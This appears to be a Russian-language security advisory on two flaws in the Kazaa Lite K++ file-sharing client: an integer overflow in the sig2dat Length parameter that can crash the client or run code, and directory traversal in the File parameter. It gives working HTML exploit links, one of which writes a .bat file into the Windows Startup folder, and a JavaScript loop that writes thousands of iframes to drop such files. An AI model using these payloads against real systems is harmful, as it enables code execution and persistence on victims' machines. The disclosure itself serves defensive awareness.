• Партнер

  • Программа: Kazaa lite k++ 

    Обнаружено две уязвимости в менеджере пиринговых сетей Kazaa. Удаленный пользователь может вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Удаленный пользователь может создать произвольное количество файлов на текущем разделе.

    1. Целочисленное переполнение в протоколе Sig2Dat позволяет вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Уязвимость существует в параметре Length в байтах. Удаленный пользователь может передать значение превышающее 999999999 и вызвать переполнение целочисленных. Удачная эксплуатация уязвимости позволит выполнить произвольный код на целевой системе. 

    Пример:

    <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:
    999999999999999999999999999%20Bytes,364489KB%7CUUHash:
    =DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A> 

    2. Уязвимость в параметре File позволяет выйти за пределы директории и создать файл в любом месте раздела используя символы перехода между каталогами (‘../’). 

    Примеры:

    <A href="https://xakep.ru/wp-content/uploads/post/25239/sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength: 
    373236528%20Bytes,364489KB%7CUUHash:= DEfm3HmvILkNcbY7j5NGa%2BD11CQ =
    %7C/">CLICK HERE</A>

    <script>
    var i
    for (i=1;i<10000;i++)
    {
    mylocation="<iframe src='sig2dat://% CFile:../../../../../../Docume~1/All Users /StartMenu/Programs/Startup/cool"+i+".bat %7CLength:373236528%20Bytes, 364489KB%
    7CUUHash:= DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'> </iframe>";
    document.write(mylocation);
    }
    </script>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии